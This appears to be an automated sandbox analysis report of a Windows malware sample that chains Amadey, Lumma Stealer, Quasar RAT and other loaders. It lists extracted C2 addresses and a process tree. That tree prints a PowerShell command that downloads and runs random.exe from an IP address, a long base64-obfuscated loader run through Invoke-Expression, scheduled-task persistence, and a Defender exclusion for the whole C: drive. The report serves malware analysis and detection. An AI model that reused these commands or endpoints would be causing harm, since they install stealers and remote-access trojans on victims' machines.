Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/03/2025, 14:53

General

  • Target

    2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    fd21a7eb1fb3c59be7cac38ecaa11213

  • SHA1

    fac587a2d542cba45bdfacabf96b76365cf6733f

  • SHA256

    968347c6a38e85cd7db48dbc60d7e49bd1181050a1984029d62a2f92dbb9ae35

  • SHA512

    6b3b1ac8077f23d3aded1934322608ddd6eac70d11cc01ad5787c90d17f73aa5b7a85f0ca698a4fc76a1266982f8a60ce1bef9f949ebc4e55ae13ba2085f2ee1

  • SSDEEP

    24576:mqDEvCTbMWu7rQYlBQcBiT6rprG8a0Vu:mTvC/MTQYxsWR7a0V

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

https://cosmosyf.top/GOsznj

https://byteplusx.digital/aXweAX

https://skynetxc.live/AksoPA

https://pixtreev.run/LkaUz

https://sparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 9 IoCs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 17 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2656
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4232
    • C:\Users\Admin\AppData\Local\Temp\2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:5548
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn 7eLOBmaNIKL /tr "mshta C:\Users\Admin\AppData\Local\Temp\7M5R0VMu8.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:6068
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn 7eLOBmaNIKL /tr "mshta C:\Users\Admin\AppData\Local\Temp\7M5R0VMu8.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2464
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\7M5R0VMu8.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3660
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4588
          • C:\Users\Admin\AppData\Local\TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE
            "C:\Users\Admin\AppData\Local\TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:5580
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1532
              • C:\Users\Admin\AppData\Local\Temp\10382080101\84023c6440.exe
                "C:\Users\Admin\AppData\Local\Temp\10382080101\84023c6440.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:5600
              • C:\Users\Admin\AppData\Local\Temp\10382090101\8ccc92f4b9.exe
                "C:\Users\Admin\AppData\Local\Temp\10382090101\8ccc92f4b9.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:4156
              • C:\Users\Admin\AppData\Local\Temp\10382100101\fe8615daed.exe
                "C:\Users\Admin\AppData\Local\Temp\10382100101\fe8615daed.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3676
                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                  "C:\Users\Admin\AppData\Local\Temp\10382100101\fe8615daed.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:3044
              • C:\Users\Admin\AppData\Local\Temp\10382110101\d374d248b2.exe
                "C:\Users\Admin\AppData\Local\Temp\10382110101\d374d248b2.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:4668
                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                  "C:\Users\Admin\AppData\Local\Temp\10382110101\d374d248b2.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2696
              • C:\Users\Admin\AppData\Local\Temp\10382120101\19b9006121.exe
                "C:\Users\Admin\AppData\Local\Temp\10382120101\19b9006121.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2772
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5212
              • C:\Users\Admin\AppData\Local\Temp\10382130101\kO2IdCz.exe
                "C:\Users\Admin\AppData\Local\Temp\10382130101\kO2IdCz.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of WriteProcessMemory
                PID:4764
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c 67e8f4de3ad1d.vbs
                  7⤵
                    PID:2456
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10382141121\5YB5L4K.cmd"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:3580
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10382141121\5YB5L4K.cmd"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:4940
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                      8⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Drops startup file
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: AddClipboardFormatListener
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4464
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2428
                • C:\Users\Admin\AppData\Local\Temp\10382150101\Rm3cVPI.exe
                  "C:\Users\Admin\AppData\Local\Temp\10382150101\Rm3cVPI.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1480
                • C:\Users\Admin\AppData\Local\Temp\10382160101\TbV75ZR.exe
                  "C:\Users\Admin\AppData\Local\Temp\10382160101\TbV75ZR.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:5772
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                      PID:2460
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                        PID:5488
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3968
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 524
                          8⤵
                          • Program crash
                          PID:3212
                    • C:\Users\Admin\AppData\Local\Temp\10382170101\7IIl2eE.exe
                      "C:\Users\Admin\AppData\Local\Temp\10382170101\7IIl2eE.exe"
                      6⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      PID:1400
                      • C:\Windows\SysWOW64\CMD.exe
                        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:5924
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist
                          8⤵
                          • Enumerates processes with tasklist
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1848
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr /I "opssvc wrsa"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:2500
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist
                          8⤵
                          • Enumerates processes with tasklist
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3192
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:4300
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c md 418377
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:4516
                        • C:\Windows\SysWOW64\extrac32.exe
                          extrac32 /Y /E Leon.cab
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:4468
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr /V "BEVERAGES" Compilation
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:2300
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:3176
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:5260
                        • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                          Passwords.com N
                          8⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:5288
                        • C:\Windows\SysWOW64\choice.exe
                          choice /d y /t 5
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:4044
                    • C:\Users\Admin\AppData\Local\Temp\10382180101\u75a1_003.exe
                      "C:\Users\Admin\AppData\Local\Temp\10382180101\u75a1_003.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:4608
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            1⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:4632
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            1⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:5744
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:2244
            • C:\Windows\system32\rundll32.exe
              rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
              2⤵
                PID:4412
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3968 -ip 3968
              1⤵
                PID:1900

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

